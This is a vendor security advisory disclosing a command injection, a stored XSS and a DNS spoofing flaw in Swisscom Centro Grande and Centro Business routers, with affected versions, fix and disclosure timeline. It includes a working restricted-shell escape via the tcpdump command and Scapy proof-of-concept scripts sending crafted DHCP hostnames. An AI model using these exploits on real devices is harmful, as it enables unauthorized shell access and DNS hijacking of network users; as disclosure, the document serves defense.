#################################################################################### # # SWISSCOM CSIRT ADVISORY # https://www.swisscom.ch/en/about/company/portrait/network/security/bug-bounty.html # #################################################################################### # # Product: Swisscom Centro Grande # Vendor: Swisscom (schweiz) AG # CVE: CVE-2019-19940, CVE-2019-19941, CVE-2019-19942 # Subject: Remote Code Execution # Risk: Medium # Effect: Exploitable in Local Network # Author: Cyril Mueller # Coord.: Florian Badertscher # Date: 21.01.2020 # #################################################################################### Affected -------- Vulnerable: * Centro Grande 6.14.06 and below * Centro Business 1.0 below 7.10.18 * Centro Business 2.0 below 8.02.04 Not vulnerable: * Centro Grande version 6.16.12 * Centro Business 1.0 version 7.10.18 * Centro Business 2.0 version 8.02.04 Summary ------- Multiple vulnerabilities were fixed in the Centro Grande (ADB) and Centro Business (ADB) line of products. CVE-2019-19940 Command injection: * Centro Grande family (ADB), below version 6.14.06 CVE-2019-19941 Stored XSS: * Centro Grande family (ADB), below version 6.14.06 CVE-2019-19942 DNS Spoofing: * Centro Grande family (ADB), below version 6.14.06 * Centro Business 1.0 (ADB), below version 7.10.18 * Centro Business 2.0 (2.0), below version 8.02.04 CVE-2019-19940 Command Injection -------------------------------- Incorrect input sanitation in text oriented user interfaces (telnet, ssh) in Swisscom Centro Grande 6.14.06 and below allows a remote authenticated users to execute arbitrary commands via command injection. Once a is connected and authenticated to the router over SSH, the user is greeted by a restricted shell (CLISH). It uses configuration to whitelist and define commands and its arguments. The whitelist is not strict enought, and backslashes can be used to escape from quoted strings: ADB# ping \ sh: syntax error: unterminated quoted string It is possible to execute shell commands as the user "admin". The following command spawns a unrestricted shell, using the whitelisted tcpdump command: ADB# tcpdump enable file filter br0 \ "; sh -c sh \" ERROR: Output File has to be stored in a connected mounted USB memory device (ex. /mnt/sda1/ ) HELP: [CUT] BusyBox v1.17.3 (2015-09-23 17:35:23 CEST) built-in shell (ash) Enter 'help' for a list of built-in commands. /root $ echo $USER admin CVE-2019-19941 Stored XSS ------------------------- Missing output sanitation in Swisscom Centro Grande 6.14.06 and below allows a remote attacker with local network access to inject JavaScript code in the web interface via crafted host names in DHCP requests. The injection code is sent in the ‘hostname’ field of the request. The hostname is stored temporarily on the router and is embedded into HTML code of the administrator web interface in the overview page (first page after login) and in the device overview page. The attack needs some time until the data cache is updated. It also happens in few cases that the data is perfectly escaped and displayed correctly but this happens rarely. It seems that the payload (hostname) is limited to ~72 characters. The following Python script sends a DHCP request and waits for the answer. After a run the hostname will be stored. from scapy.all import * def send_dhcp_request(hostname): ''' Send one dhcp request and wait for an answer. :param hostname: The hostname to send ''' conf.checkIPaddr = False fam,hw = get_if_raw_hwaddr(conf.iface) dhcp_request = (Ether(dst="ff:ff:ff:ff:ff:ff") / IP(src="0.0.0.0",dst="255.255.255.255") / UDP(sport=68,dport=67) / BOOTP(chaddr=hw) / DHCP(options=[ ("message-type","request"), ('hostname', hostname),"end"])) srp(dhcp_request) send_dhcp_request('') CVE-2019-19942 DNS Spoofing --------------------------- Missing hostname validation Swisscom Centro Grande below version 6.16.12, Centro Business 1.0 (ADB) below version 7.10.18 and Centro Business 2.0 below version 8.02.04 allows a remote attacker with local network access to inject its local IP address as domain entry into the DNS service of the router via crafted host names in DHCP requests. The following proof-of-concept Python script sends a request, that sends a DHCP request. No DHCP discovery is required, if the currently assigned IP address is used. The hostname field of the DHCP message is set to the domain "example.com" and "www.example.com": from scapy.all import * def send_dhcp_request(hostname): ''' Send one dhcp request and wait for an answer. :param hostname: The hostname to send ''' conf.checkIPaddr = False fam,hw = get_if_raw_hwaddr(conf.iface) dhcp_request = (Ether(dst="ff:ff:ff:ff:ff:ff") / IP(src="0.0.0.0",dst="255.255.255.255") / UDP(sport=68,dport=67) / BOOTP(chaddr=hw) / DHCP(options=[ ("message-type","request"), ('hostname', hostname),"end"])) srp(dhcp_request) send_dhcp_request('example.com www.example.com') After executing this scripts, the built-in DNS server will resolve both www.example.com and example.com to the IP address currently assigned by the DHCP server. Workaround / Fix ---------------- Upgrade to the latest firmware release. No action required for all Swisscom customers, as their devices are managed by Swisscom. Timeline -------- 2016-01-07 Vendor notification of command injection 2016-01-11 Vendor notification of stored XSS 2016-01-19 Vendor confirmation of command injection and stored XSS 2016-03-06 Vendor notification DNS spoofing 2016-03-21 Vendor confirmation DNS spoofing 2016-03-30 Communication completion of fix, announcement delay rollout of fix 2016-04 Rollout fixed versions started Centro Grande, Centro Business 1.0, Centro Business 2.0 2017-01 Rollout complete fixed versions Centro Business 1.0 and Centro Business 2.0 2017-05 Rollout complete fixed versions Centro Grande 2017-05-27 Publication by the author 2020-01-21 Public disclosure by the vendor